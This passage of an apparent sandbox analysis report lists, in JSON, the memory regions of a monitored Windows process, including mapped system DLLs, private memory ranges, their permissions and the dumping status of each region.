"region_type": "private_memory", "start_va": 30343168, "timestamp": "00:01:08.187", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 913408, "start_va": 31588352, "type": "region", "version": 1 }, "end_va": 32501759, "entry_point": 0, "filename": null, "id": "region_1460", "name": "pagefile_0x0000000001e20000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 31588352, "timestamp": "00:01:08.187", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 626688, "start_va": 8791770071040, "type": "region", "version": 1 }, "end_va": 8791770697727, "entry_point": 8791770078224, "filename": "\\Windows\\System32\\clbcatq.dll", "id": "region_1461", "name": "clbcatq.dll", "norm_filename": "c:\\windows\\system32\\clbcatq.dll", "region_type": "memory_mapped_file", "start_va": 8791770071040, "timestamp": "00:01:08.187", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 14188544, "start_va": 8791773216768, "type": "region", "version": 1 }, "end_va": 8791787405311, "entry_point": 8791773728444, "filename": "\\Windows\\System32\\shell32.dll", "id": "region_1462", "name": "shell32.dll", "norm_filename": "c:\\windows\\system32\\shell32.dll", "region_type": "memory_mapped_file", "start_va": 8791773216768, "timestamp": "00:01:08.188", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created 
because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 8192, "start_va": 1769472, "type": "region", "version": 1 }, "end_va": 1777663, "entry_point": 0, "filename": null, "id": "region_1486", "name": "pagefile_0x00000000001b0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 1769472, "timestamp": "00:01:08.261", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 1835008, "type": "region", "version": 1 }, "end_va": 1839103, "entry_point": 0, "filename": null, "id": "region_1487", "name": "pagefile_0x00000000001c0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 1835008, "timestamp": "00:01:08.261", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 8192, "start_va": 1966080, "type": "region", "version": 1 }, "end_va": 1974271, "entry_point": 0, "filename": null, "id": "region_1488", "name": "pagefile_0x00000000001e0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 1966080, "timestamp": "00:01:08.261", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 2945024, "start_va": 32505856, "type": "region", "version": 1 }, "end_va": 35450879, "entry_point": 32505856, "filename": "\\Windows\\Globalization\\Sorting\\SortDefault.nls", "id": "region_1489", "name": "sortdefault.nls", 
"norm_filename": "c:\\windows\\globalization\\sorting\\sortdefault.nls", "region_type": "memory_mapped_file", "start_va": 32505856, "timestamp": "00:01:08.261", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 524288, "start_va": 36372480, "type": "region", "version": 1 }, "end_va": 36896767, "entry_point": 0, "filename": null, "id": "region_1490", "name": "private_0x00000000022b0000", "norm_filename": null, "region_type": "private_memory", "start_va": 36372480, "timestamp": "00:01:08.262", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 2048000, "start_va": 8791731339264, "type": "region", "version": 1 }, "end_va": 8791733387263, "entry_point": 8791732963620, "filename": "\\Windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac\\comctl32.dll", "id": "region_1491", "name": "comctl32.dll", "norm_filename": "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac\\comctl32.dll", "region_type": "memory_mapped_file", "start_va": 8791731339264, "timestamp": "00:01:08.262", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1228800, "start_va": 8791736057856, "type": "region", "version": 1 }, "end_va": 8791737286655, "entry_point": 8791736095932, "filename": "\\Windows\\System32\\propsys.dll", "id": "region_1492", "name": "propsys.dll", "norm_filename": 
"c:\\windows\\system32\\propsys.dll", "region_type": "memory_mapped_file", "start_va": 8791736057856, "timestamp": "00:01:08.263", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 122880, "start_va": 8791742414848, "type": "region", "version": 1 }, "end_va": 8791742537727, "entry_point": 8791742419896, "filename": "\\Windows\\System32\\userenv.dll", "id": "region_1493", "name": "userenv.dll", "norm_filename": "c:\\windows\\system32\\userenv.dll", "region_type": "memory_mapped_file", "start_va": 8791742414848, "timestamp": "00:01:08.263", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 61440, "start_va": 8791755390976, "type": "region", "version": 1 }, "end_va": 8791755452415, "entry_point": 8791755397552, "filename": "\\Windows\\System32\\profapi.dll", "id": "region_1494", "name": "profapi.dll", "norm_filename": "c:\\windows\\system32\\profapi.dll", "region_type": "memory_mapped_file", "start_va": 8791755390976, "timestamp": "00:01:08.264", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000009-region_00001495-addr_0x000007fffffdb000-size_0x0000000000002000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_244", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 8192, "start_va": 8796092870656, "type": "region", "version": 1 }, "end_va": 8796092878847, "entry_point": 0, "filename": null, "id": "region_1495", "name": "private_0x000007fffffdb000", "norm_filename": null, "region_type": "private_memory", "start_va": 
8796092870656, "timestamp": "00:01:08.267", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 2162688, "type": "region", "version": 1 }, "end_va": 2166783, "entry_point": 0, "filename": null, "id": "region_1514", "name": "pagefile_0x0000000000210000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2162688, "timestamp": "00:01:08.454", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable" ], "ref_process_dump": null, "size": 126976, "start_va": 29622272, "type": "region", "version": 1 }, "end_va": 29749247, "entry_point": 29622272, "filename": "\\Users\\aETAdzjz\\AppData\\Local\\Microsoft\\Windows\\Caches\\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000011.db", "id": "region_1515", "name": "{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000011.db", "norm_filename": "c:\\users\\aetadzjz\\appdata\\local\\microsoft\\windows\\caches\\{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000011.db", "region_type": "memory_mapped_file", "start_va": 29622272, "timestamp": "00:01:08.454", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4141056, "start_va": 36896768, "type": "region", "version": 1 }, "end_va": 41037823, "entry_point": 0, "filename": null, "id": "region_1516", "name": "pagefile_0x0000000002330000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 36896768, "timestamp": "00:01:08.454", 
"type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 524288, "start_va": 41418752, "type": "region", "version": 1 }, "end_va": 41943039, "entry_point": 0, "filename": null, "id": "region_1517", "name": "private_0x0000000002780000", "norm_filename": null, "region_type": "private_memory", "start_va": 41418752, "timestamp": "00:01:08.454", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 212992, "start_va": 8791631986688, "type": "region", "version": 1 }, "end_va": 8791632199679, "entry_point": 8791631992976, "filename": "\\Windows\\System32\\shdocvw.dll", "id": "region_1518", "name": "shdocvw.dll", "norm_filename": "c:\\windows\\system32\\shdocvw.dll", "region_type": "memory_mapped_file", "start_va": 8791631986688, "timestamp": "00:01:08.454", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 356352, "start_va": 8791682449408, "type": "region", "version": 1 }, "end_va": 8791682805759, "entry_point": 8791682453784, "filename": "\\Windows\\System32\\apphelp.dll", "id": "region_1519", "name": "apphelp.dll", "norm_filename": "c:\\windows\\system32\\apphelp.dll", "region_type": "memory_mapped_file", "start_va": 8791682449408, "timestamp": "00:01:08.455", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], 
"ref_process_dump": null, "size": 184320, "start_va": 8791738548224, "type": "region", "version": 1 }, "end_va": 8791738732543, "entry_point": 8791738552336, "filename": "\\Windows\\System32\\ntmarta.dll", "id": "region_1520", "name": "ntmarta.dll", "norm_filename": "c:\\windows\\system32\\ntmarta.dll", "region_type": "memory_mapped_file", "start_va": 8791738548224, "timestamp": "00:01:08.456", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 106496, "start_va": 8791757881344, "type": "region", "version": 1 }, "end_va": 8791757987839, "entry_point": 8791757886808, "filename": "\\Windows\\System32\\devobj.dll", "id": "region_1521", "name": "devobj.dll", "norm_filename": "c:\\windows\\system32\\devobj.dll", "region_type": "memory_mapped_file", "start_va": 8791757881344, "timestamp": "00:01:08.456", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 221184, "start_va": 8791758471168, "type": "region", "version": 1 }, "end_va": 8791758692351, "entry_point": 8791758476404, "filename": "\\Windows\\System32\\cfgmgr32.dll", "id": "region_1522", "name": "cfgmgr32.dll", "norm_filename": "c:\\windows\\system32\\cfgmgr32.dll", "region_type": "memory_mapped_file", "start_va": 8791758471168, "timestamp": "00:01:08.457", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1929216, "start_va": 8791759716352, "type": "region", "version": 1 }, "end_va": 8791761645567, "entry_point": 8791759720464, "filename": 
"\\Windows\\System32\\setupapi.dll", "id": "region_1523", "name": "setupapi.dll", "norm_filename": "c:\\windows\\system32\\setupapi.dll", "region_type": "memory_mapped_file", "start_va": 8791759716352, "timestamp": "00:01:08.457", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 335872, "start_va": 8791772823552, "type": "region", "version": 1 }, "end_va": 8791773159423, "entry_point": 8791772827860, "filename": "\\Windows\\System32\\Wldap32.dll", "id": "region_1524", "name": "wldap32.dll", "norm_filename": "c:\\windows\\system32\\wldap32.dll", "region_type": "memory_mapped_file", "start_va": 8791772823552, "timestamp": "00:01:08.458", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000009-region_00001525-addr_0x000007fffffd9000-size_0x0000000000002000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_249", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 8192, "start_va": 8796092862464, "type": "region", "version": 1 }, "end_va": 8796092870655, "entry_point": 0, "filename": null, "id": "region_1525", "name": "private_0x000007fffffd9000", "norm_filename": null, "region_type": "private_memory", "start_va": 8796092862464, "timestamp": "00:01:08.459", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16384, "start_va": 2031616, "type": "region", "version": 1 }, "end_va": 2047999, "entry_point": 2031616, "filename": "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db", "id": "region_1584", "name": "cversions.2.db", 
"norm_filename": "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db", "region_type": "memory_mapped_file", "start_va": 2031616, "timestamp": "00:01:08.816", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable" ], "ref_process_dump": null, "size": 196608, "start_va": 29753344, "type": "region", "version": 1 }, "end_va": 29949951, "entry_point": 29753344, "filename": "\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000018.db", "id": "region_1585", "name": "{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000018.db", "norm_filename": "c:\\programdata\\microsoft\\windows\\caches\\{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000018.db", "region_type": "memory_mapped_file", "start_va": 29753344, "timestamp": "00:01:08.816", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16384, "start_va": 29949952, "type": "region", "version": 1 }, "end_va": 29966335, "entry_point": 29949952, "filename": "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db", "id": "region_1586", "name": "cversions.2.db", "norm_filename": "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db", "region_type": "memory_mapped_file", "start_va": 29949952, "timestamp": "00:01:08.817", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable" ], "ref_process_dump": null, "size": 417792, "start_va": 35454976, "type": "region", "version": 1 }, "end_va": 35872767, "entry_point": 35454976, "filename": 
"\\ProgramData\\Microsoft\\Windows\\Caches\\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000002.db", "id": "region_1587", "name": "{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db", "norm_filename": "c:\\programdata\\microsoft\\windows\\caches\\{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db", "region_type": "memory_mapped_file", "start_va": 35454976, "timestamp": "00:01:08.817", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 524288, "start_va": 42467328, "type": "region", "version": 1 }, "end_va": 42991615, "entry_point": 0, "filename": null, "id": "region_1588", "name": "private_0x0000000002880000", "norm_filename": null, "region_type": "private_memory", "start_va": 42467328, "timestamp": "00:01:08.820", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 49152, "start_va": 8791631921152, "type": "region", "version": 1 }, "end_va": 8791631970303, "entry_point": 8791631926144, "filename": "\\Windows\\System32\\linkinfo.dll", "id": "region_1589", "name": "linkinfo.dll", "norm_filename": "c:\\windows\\system32\\linkinfo.dll", "region_type": "memory_mapped_file", "start_va": 8791631921152, "timestamp": "00:01:08.820", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 524288, "start_va": 8791659053056, "type": "region", "version": 1 }, "end_va": 8791659577343, "entry_point": 8791659072140, "filename": 
"\\Windows\\System32\\ntshrui.dll", "id": "region_1590", "name": "ntshrui.dll", "norm_filename": "c:\\windows\\system32\\ntshrui.dll", "region_type": "memory_mapped_file", "start_va": 8791659053056, "timestamp": "00:01:08.820", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 61440, "start_va": 8791659577344, "type": "region", "version": 1 }, "end_va": 8791659638783, "entry_point": 8791659581504, "filename": "\\Windows\\System32\\cscapi.dll", "id": "region_1591", "name": "cscapi.dll", "norm_filename": "c:\\windows\\system32\\cscapi.dll", "region_type": "memory_mapped_file", "start_va": 8791659577344, "timestamp": "00:01:08.821", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 45056, "start_va": 8791729766400, "type": "region", "version": 1 }, "end_va": 8791729811455, "entry_point": 8791729786764, "filename": "\\Windows\\System32\\slc.dll", "id": "region_1592", "name": "slc.dll", "norm_filename": "c:\\windows\\system32\\slc.dll", "region_type": "memory_mapped_file", "start_va": 8791729766400, "timestamp": "00:01:08.821", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 143360, "start_va": 8791753228288, "type": "region", "version": 1 }, "end_va": 8791753371647, "entry_point": 8791753232792, "filename": "\\Windows\\System32\\srvcli.dll", "id": "region_1593", "name": "srvcli.dll", "norm_filename": "c:\\windows\\system32\\srvcli.dll", "region_type": "memory_mapped_file", "start_va": 
8791753228288, "timestamp": "00:01:08.822", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000009-region_00001594-addr_0x000007fffffd7000-size_0x0000000000002000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_263", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 8192, "start_va": 8796092854272, "type": "region", "version": 1 }, "end_va": 8796092862463, "entry_point": 0, "filename": null, "id": "region_1594", "name": "private_0x000007fffffd7000", "norm_filename": null, "region_type": "private_memory", "start_va": 8796092854272, "timestamp": "00:01:08.823", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 626688, "start_va": 8791550525440, "type": "region", "version": 1 }, "end_va": 8791551152127, "entry_point": 8791550535280, "filename": "\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscoreei.dll", "id": "region_1595", "name": "mscoreei.dll", "norm_filename": "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\mscoreei.dll", "region_type": "memory_mapped_file", "start_va": 8791550525440, "timestamp": "00:01:08.846", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 290816, "start_va": 8791744839680, "type": "region", "version": 1 }, "end_va": 8791745130495, "entry_point": 8791744843876, "filename": "\\Windows\\System32\\rsaenh.dll", "id": "region_1596", "name": "rsaenh.dll", "norm_filename": "c:\\windows\\system32\\rsaenh.dll", "region_type": "memory_mapped_file", "start_va": 8791744839680, 
"timestamp": "00:01:08.847", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 94208, "start_va": 8791747985408, "type": "region", "version": 1 }, "end_va": 8791748079615, "entry_point": 8791747998392, "filename": "\\Windows\\System32\\cryptsp.dll", "id": "region_1597", "name": "cryptsp.dll", "norm_filename": "c:\\windows\\system32\\cryptsp.dll", "region_type": "memory_mapped_file", "start_va": 8791747985408, "timestamp": "00:01:08.847", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 30015488, "type": "region", "version": 1 }, "end_va": 30019583, "entry_point": 0, "filename": null, "id": "region_1598", "name": "pagefile_0x0000000001ca0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 30015488, "timestamp": "00:01:08.949", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000009-region_00001599-addr_0x00000000029e0000-size_0x0000000000010000-perm_rw.bin", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_264", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 43909120, "type": "region", "version": 1 }, "end_va": 43974655, "entry_point": 0, "filename": null, "id": "region_1599", "name": "private_0x00000000029e0000", "norm_filename": null, "region_type": "private_memory", "start_va": 43909120, "timestamp": "00:01:08.950", "type": "region", "version": 1 }, { 
"dump": { "filename": "process_00000009-region_00001600-addr_0x0000000002ae0000-size_0x0000000000080000-perm_rwx.bin", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": { "ref_id": "proc_dump_265", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 524288, "start_va": 44957696, "type": "region", "version": 1 }, "end_va": 45481983, "entry_point": 0, "filename": null, "id": "region_1600", "name": "private_0x0000000002ae0000", "norm_filename": null, "region_type": "private_memory", "start_va": 44957696, "timestamp": "00:01:08.950", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000009-region_00001601-addr_0x0000000002b60000-size_0x0000000000100000-perm_rw.bin", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_266", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 45481984, "type": "region", "version": 1 }, "end_va": 46530559, "entry_point": 0, "filename": null, "id": "region_1601", "name": "private_0x0000000002b60000", "norm_filename": null, "region_type": "private_memory", "start_va": 45481984, "timestamp": "00:01:08.951", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 823296, "start_va": 1966473216, "type": "region", "version": 1 }, "end_va": 1967296511, "entry_point": 1966484976, "filename": 
"\\Windows\\winsxs\\amd64_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.6195_none_88e41e092fab0294\\msvcr80.dll", "id": "region_1602", "name": "msvcr80.dll", "norm_filename": "c:\\windows\\winsxs\\amd64_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.6195_none_88e41e092fab0294\\msvcr80.dll", "region_type": "memory_mapped_file", "start_va": 1966473216, "timestamp": "00:01:08.951", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 10080256, "start_va": 8791320756224, "type": "region", "version": 1 }, "end_va": 8791330836479, "entry_point": 8791325254400, "filename": "\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorwks.dll", "id": "region_1603", "name": "mscorwks.dll", "norm_filename": "c:\\windows\\microsoft.net\\framework64\\v2.0.50727\\mscorwks.dll", "region_type": "memory_mapped_file", "start_va": 8791320756224, "timestamp": "00:01:08.952", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 49152, "start_va": 8791740448768, "type": "region", "version": 1 }, "end_va": 8791740497919, "entry_point": 8791740452964, "filename": "\\Windows\\System32\\version.dll", "id": "region_1604", "name": "version.dll", "norm_filename": "c:\\windows\\system32\\version.dll", "region_type": "memory_mapped_file", "start_va": 8791740448768, "timestamp": "00:01:08.952", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 12288, "start_va": 30081024, "type": 
"region", "version": 1 }, "end_va": 30093311, "entry_point": 0, "filename": null, "id": "region_1621", "name": "pagefile_0x0000000001cb0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 30081024, "timestamp": "00:01:09.185", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 30146560, "type": "region", "version": 1 }, "end_va": 30150655, "entry_point": 0, "filename": null, "id": "region_1622", "name": "pagefile_0x0000000001cc0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 30146560, "timestamp": "00:01:09.185", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000009-region_00001623-addr_0x0000000001d80000-size_0x0000000000020000-perm_.bin", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "" ], "ref_process_dump": { "ref_id": "proc_dump_277", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 131072, "start_va": 30932992, "type": "region", "version": 1 }, "end_va": 31064063, "entry_point": 0, "filename": null, "id": "region_1623", "name": "private_0x0000000001d80000", "norm_filename": null, "region_type": "private_memory", "start_va": 30932992, "timestamp": "00:01:09.186", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 524288, "start_va": 44105728, "type": "region", "version": 1 }, "end_va": 44630015, "entry_point": 0, "filename": null, "id": "region_1624", 
"name": "private_0x0000000002a10000", "norm_filename": null, "region_type": "private_memory", "start_va": 44105728, "timestamp": "00:01:09.186", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 524288, "start_va": 46792704, "type": "region", "version": 1 }, "end_va": 47316991, "entry_point": 0, "filename": null, "id": "region_1625", "name": "private_0x0000000002ca0000", "norm_filename": null, "region_type": "private_memory", "start_va": 46792704, "timestamp": "00:01:09.186", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 402653184, "start_va": 47316992, "type": "region", "version": 1 }, "end_va": 449970175, "entry_point": 0, "filename": null, "id": "region_1626", "name": "private_0x0000000002d20000", "norm_filename": null, "region_type": "private_memory", "start_va": 47316992, "timestamp": "00:01:09.194", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000009-region_00001627-addr_0x000000001ad20000-size_0x00000000006d0000-perm_rw.bin", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_278", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 7143424, "start_va": 449970176, "type": "region", "version": 1 }, "end_va": 457113599, "entry_point": 0, "filename": null, "id": "region_1627", "name": "private_0x000000001ad20000", "norm_filename": null, "region_type": "private_memory", 
